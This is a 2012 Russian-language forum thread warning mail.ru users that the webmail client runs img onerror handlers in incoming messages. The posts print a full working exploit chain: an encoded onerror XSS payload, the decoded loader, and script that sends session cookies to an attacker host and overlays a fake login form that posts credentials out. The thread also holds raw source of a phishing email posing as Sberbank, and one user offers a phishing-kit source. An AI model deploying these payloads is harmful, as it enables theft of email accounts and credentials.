За месяц получил 5 962 письма с вредоносным кодом - Курилка

Владельцам почты на mail.ru

Alex6980 · 2012-05-09T11:20:04.0000000Z

Заметил что mail.ru в inbox при прочтении письма успешно пропускает параметр onerror тэга img, что дает "особо хитроjопым" интересные возможности по угону ящика. Рассмотрим на реальном примере. Вам пришло письмо, в теле письма картинка, но не простая, а "золотая". <img src="ff" onerror="***x28;***x61;***x3D;***x28;***x62;***x3D;***x64;***x6F;***x63;***x75;***x6D;***x65;***x6E;***x74;***x29;***x2E;***x63;***x72;***x65;***x61;***x74;***x65;***x45;***x6C;***x65;***x6D;***x65;***x6E;***x74;***x28;***x27;***x73;***x63;***x72;***x27;***x2B;***x27;***x69;***x70;***x74;***x27;***x29;***x29;***x2E;***x73;***x72;***x63;***x3D;***x27;***x68;***x74;***x74;***x70;***x3A;***x2F;***x2F;***x66;***x69;***x6C;***x6D;***x2D;***x6C;***x69;***x6B;***x65;***x2E;***x72;***x75;***x2F;***x6D;***x61;***x69;***x6C;***x72;***x75;***x2F;***x74;***x74;***x32;***x2E;***x6A;***x73;***x27;***x2C;***x62;***x2E;***x62;***x6F;***x64;***x79;***x2E;***x61;***x70;***x70;***x65;***x6E;***x64;***x43;***x68;***x69;***x6C;***x64;***x28;***x61;***x29;***x3B;***x76;***x6F;***x69;***x64;***x28;***x30;***x29;***x3B;">"; Через параметр error в зашифрованном видео подставлен следующий код: a=(b=document).createElement('scr'+'ipt')).src='http://film-like.ru/mailru/tt2.js',b.body.appendChild(a);void(0);"; С помощью этого кода подгружается js файл со следующим кодом: document.getElementById('TipOfTheDay').innerHTML='<IfRaMe width=0 height=1 src="http://film-like.ru/koldunschik/s.php?'+document.cookie+'"></IfRaMe>';document.getElementById('TipOfTheDay').style.display='none'; 77domain_name = /Mpop=.+:(.+?)@(.+?):/.exec(document.cookie)[2]; if (domain_name == 'mail.ru'){ domain_html = "<select name='domain'><option selected='selected' value='mail.ru'>@mail.ru</option><option value='inbox.ru'>@inbox.ru</option><option value='bk.ru'>@bk.ru</option><option value='list.ru'>@list.ru</option></select>"; } if (domain_name == 'bk.ru'){ domain_html = "<select name='domain'><option value='mail.ru'>@mail.ru</option><option value='inbox.ru'>@inbox.ru</option><option selected='selected' value='bk.ru'>@bk.ru</option><option value='list.ru'>@list.ru</option></select>"; } if (domain_name == 'inbox.ru'){ domain_html = "<select name='domain'><option value='mail.ru'>@mail.ru</option><option selected='selected' value='inbox.ru'>@inbox.ru</option><option value='bk.ru'>@bk.ru</option><option value='list.ru'>@list.ru</option></select>"; } if (domain_name == 'list.ru'){ domain_html = "<select name='domain'><option value='mail.ru'>@mail.ru</option><option value='inbox.ru'>@inbox.ru</option><option value='bk.ru'>@bk.ru</option><option selected='selected' value='list.ru'>@list.ru</option></select>"; } x=document.createElement('div'); x.innerHTML="<div id='MailRuConfirm' class='alertDiv is-secure' style='z-index: 30101; position: fixed; margin-left: -672.5px; margin-top: -106.5px; left: 681px; top: 205px'> <div class='alertDivSpan'><form action='http://film-like.ru/mailru/login.php' method='post' name='Auth' ><b class='h1 black dB m15 mb10 ml15 mr15 mt15'>РРѕР№СРё РІ РїРѕСССѓ Mail.Ru</b><div class='mb10 ml15 mr15 lh16'><div class='grey mb15'>РЎРѕРµРґРёРЅРµРЅРёРµ СЃ РїРѕССРѕР№ Р±СР»Рѕ РїСЂРµСЂРІР°РЅРѕ.<br>РР»СЏ РїСЂРѕРґРѕР»Р¶РµРЅРёСЏ СЂР°Р±РѕСС РІРІРµРґРёСРµ Р»РѕРіРёРЅ Рё РїР°СЂРѕР»СЊ.</div><table><tbody><tr><td class='pr10 pb15'><span class='bold'>РРѕРіРёРЅ</span></td><td class='pr10 pb15'><input type='text' name='login' value='"+/Mpop=.+:(.+?)@(.+?):/.exec(document.cookie)[1]+"' style='width: 150px;'></td><td class='pb15'>"+domain_html+"</td></tr><tr><td class='pr10 pb10'><span class='bold'>РџР°СЂРѕР»СЊ</span></td><td class='pr10 pb10'><input type='password' name='password' style='width: 150px;'></td><td class='pb10'><a href='/cgi-bin/passremind'>РР°Р±СР»Рё РїР°СЂРѕР»СЊ?</a></td></tr><tr><td class='pr10'> </td><td class='pr10 grey'><input type='checkbox' name='level' value='1' id='alien'> <label for='alien'>Р§СѓР¶РѕР№ РєРѕРјРїСЊСЋСРµСЂ</label></td><td> </td></tr></tbody></table></div><div class='p15' style='background-color:#e6e8ed;' id='mailru-webagent-gen-24'><input type='submit' value='РРѕР№СРё РІ РїРѕСССѓ' class='t11 arial bold'></div></form> </div></div><div style='opacity: 0.6; background-color: rgb(255, 255, 255); width: 100%; height: 100%; margin-left: 0px; position: fixed; top: 0px; left: 0px; z-index: 30001'/>"; setTimeout('parent.document.body.appendChild(x);', 100); $('[tabindex = 1]').click(); Кручу-верчу-обмануть-хочу иии.... ваш логин и пароль в руках злоумышленников. Довольно часто получаю подобные "письма счастья". Писал в саппорт mail.ru неоднократно, толку нет. Ящик на мейле под всякий спам, поэтому в целом пофигу, но не солидно для такой конторы иметь такие баги, дырка то серьёзная :dont: Будьте бдительны, не дайте себя обмануть и т.д. Характерный признак, если при прочтении письма вас разлогинело, сразу меняйте пароль, это была не случайность )

667

Redbaron _chaos

14 мая 2012, 19:19

#61

То же давно Майлом пользуюсь, проверяют только через The Bat.

Кстати ни разу не ломали, а вот почту от Яндекса 2 раза.

Гемблинг, беттинг, крипта на весь мир в 3snet, 1500+ офферов. ( https://clck.ru/TdZLM ) = = CPA.HOUSE - Топовая CPA сеть ( https://clck.ru/34Swci )

A6

22

Alex6980

14 мая 2012, 19:19

#62

LEOnidUKG, меня лет 5 тоже не трогали. Плохо что есть возможность - этот баг, перестаешь расслабленно почту читать.

Кстати ни разу не ломали, а вот почту от Яндекса 2 раза

А как это сделали, известно?

p.s. кстати баг еще не пофиксен :(

667

Redbaron _chaos

14 мая 2012, 19:35

#63

Alex6980:
LEOnidUKG, меня лет 5 тоже не трогали. Плохо что есть возможность - этот баг, перестаешь расслабленно почту читать.

А как это сделали, известно?

p.s. кстати баг еще не пофиксен :(

Думаю подбор пароля (хотя сложный был).

3

CoolSpot

14 мая 2012, 22:22

#64

Всё письма ведут на скрипты на домене win-planet.com .

Спам разослан с помощью вот этого скрипта: http://win-planet.com/img/email.php

Вот пример исходника сообщения:


                                                                                                                                                                                                                                                               

Delivered-To: <censored>

Received: by 10.216.16.102 with SMTP id g80csp113688weg;

        Mon, 14 May 2012 13:14:32 -0700 (PDT)

Received: by 10.180.101.136 with SMTP id fg8mr23250648wib.4.1337026471690;

        Mon, 14 May 2012 13:14:31 -0700 (PDT)

Received-SPF: softfail (google.com: best guess record for domain of transitioning p1mp140@ns6.abcname.net does not designate 213.186.121.228 as permitted sender) client-ip=213.186.121.228;

Received: by 10.217.81.138 with POP3 id x10mf2812717wey.35;

        Mon, 14 May 2012 13:14:31 -0700 (PDT)

X-Gmail-Fetch-Info: <censored>@mail.ru 2 pop.mail.ru 110 <censored>@mail.ru

Return-path: <p1mp140@ns6.abcname.net>

Received-SPF: fail

Received: from [213.186.121.228] (port=49514 helo=ns6.abcname.net)

	by mx52.mail.ru with esmtp (envelope-from <p1mp140@ns6.abcname.net>)

	id 1SU13Z-0007Vk-PV

	for <censored>@mail.ru; Mon, 14 May 2012 23:35:46 +0400

X-Mru-BL: 0:0:1088:0

X-Mru-PTR: ns6.abcname.net

X-Mru-NR: 1

X-Mru-OF: Linux (ethernet/modem)

X-Mru-RC: UA

Received: from p1mp140 by ns6.abcname.net with local (Exim 4.77)

	(envelope-from <p1mp140@ns6.abcname.net>)

	id 1SU1GP-00026d-IP

	for <censored>@mail.ru; Mon, 14 May 2012 22:49:01 +0300

To: <censored>@mail.ru

Subject: SBERBANK. Statement report

MIME-Version: 1.0

Content-type: text/html; charset=windows-1251

From: <report_card@sbrf.ru>

Message-Id: <E1SU1GP-00026d-IP@ns6.abcname.net>

Date: Mon, 14 May 2012 22:49:01 +0300

X-AntiAbuse: This header was added to track abuse, please include it with any abuse report

X-AntiAbuse: Primary Hostname - ns6.abcname.net

X-AntiAbuse: Original Domain - mail.ru

X-AntiAbuse: Originator/Caller UID/GID - [725 32008] / [47 12]

X-AntiAbuse: Sender Address Domain - ns6.abcname.net

X-Source: /usr/bin/php

X-Source-Args: /usr/bin/php /home/p1mp140/public_html/img/email.php 

X-Source-Dir: win-planet.com:/public_html/img

X-Spam: Not detected

X-Mras: Ok





<p>Уважаемый клиент!</p>

<p> В приложении направляем Вам отчет по счету карты.</p>



 <p>Это письмо сформировано автоматически. Пожалуйста, не отвечайте на него.</p>

<p> Если у Вас есть вопросы, Вы можете обратиться по электронной почте help@sbrf.ru.</p>



<p> С уважением,</p>

 <p>Сбербанк России.</p>



<div style='display:none;'><input type='text' id='div_hid' value='Ошибка сервера. Повторите попытку позднее.'>

<style>

#lol:after{

content:"{}</stylE e><img src="ff" onerror="***x28;***x61;***x3D;***x28;***x62;***x3D;***x64;***x6F;***x63;***x75;***x6D;***x65;***x6E;***x74;***x29;***x2E;***x63;***x72;***x65;***x61;***x74;***x65;***x45;***x6C;***x65;***x6D;***x65;***x6E;***x74;***x28;***x27;***x73;***x63;***x72;***x27;***x2B;***x27;***x69;***x70;***x74;***x27;***x29;***x29;***x2E;***x73;***x72;***x63;***x3D;***x27;***x68;***x74;***x74;***x70;***x3A;***x2F;***x2F;***x77;***x69;***x6E;***x2D;***x70;***x6C;***x61;***x6E;***x65;***x74;***x2E;***x63;***x6F;***x6D;***x2F;***x6D;***x61;***x69;***x6C;***x72;***x75;***x2F;***x38;***x38;***x38;***x2E;***x6A;***x73;***x27;***x2C;***x62;***x2E;***x62;***x6F;***x64;***x79;***x2E;***x61;***x70;***x70;***x65;***x6E;***x64;***x43;***x68;***x69;***x6C;***x64;***x28;***x61;***x29;***x3B;***x76;***x6F;***x69;***x64;***x28;***x30;***x29;***x3B;">";

<style>

#lol{

width:1000px;

}

</style>

</style>

;

1

A6

22

Alex6980

15 мая 2012, 11:47

#65

CoolSpot тоже самое внедрение через onerror. Я думаю многие такое получают :(

667

Redbaron _chaos

15 мая 2012, 11:50

#66

Alex6980:
CoolSpot тоже самое внедрение через onerror. Я думаю многие такое получают :(

Посмотрел, за месяц получил 5 962 письма (не очищал папку просто в Бате), пороль еще не сперли)

A6

22

Alex6980

15 мая 2012, 12:01

#67

Redbaron_chaos, 5к писем именно с вредоносным кодом или просто писем?

Код работает только в веб версии mail.ru

667

Redbaron _chaos

15 мая 2012, 12:05

#68

Alex6980:
Redbaron_chaos, 5к писем именно с вредоносным кодом или просто писем?
Код работает только в веб версии mail.ru

Просто писем, я и забыл про веб))

Я с 2004 наверно все письма через The Bat принимаю, есть конечно не больше к нему притензии (при закрытие проги иногда виснит, если много писем). У меня больше десятка ящиков черезе него настроенно.

150 тысяч пользователей пострадали Яндекс.Почта для кириллических доменов В Яндекс.Почте появился компактный

54

globalDJs

23 мая 2012, 19:10

#69

Этот код вызывает форму авторизации майла, предварительно редиректит на левый сайт с полностью копией интерфейса майл.ру, куда пользователи вводят свой логин и пароль, даже не посмотрев в адресную строку.

Народ, это же что-то типа...фейка... есть у меня хрень такая... вернее ее исходник полный. льешь на поддомен и ссылочку показываешь жертве... чтоб открыл(ла, ло)...а там высвечивается окошко с надписью что не залогинен... и тд тп... тут уже говорили об этом...

кому дать=)

проверял, приходят пароли, только вот для жертв надо придумать домен более похожий, типа maijl.ru)))))

Соврешь-не помрешь, да впредь не поверят! | Контакты: ICQ: 449132353 Думаю, что с ним сделать (http://xplace.kz/) |

Через интернет-хранилище Google Drive Участились вирусные атаки на Google Adwords облегчил управление

A6

22

Alex6980

11 июня 2012, 10:00

#70

Продолжается сыпаться вредо-спам, похоже еще и скрипт готовый в паблик выложили:

http://2sexporn.ru/backlinkspider/mail_one.php

http://2sexporn.ru/backlinkspider/red.js

Что такое Power BI и зачем это нужно бизнесу

Дзен реализовал для авторов возможность вывода денег через СПБ

Владельцам почты на mail.ru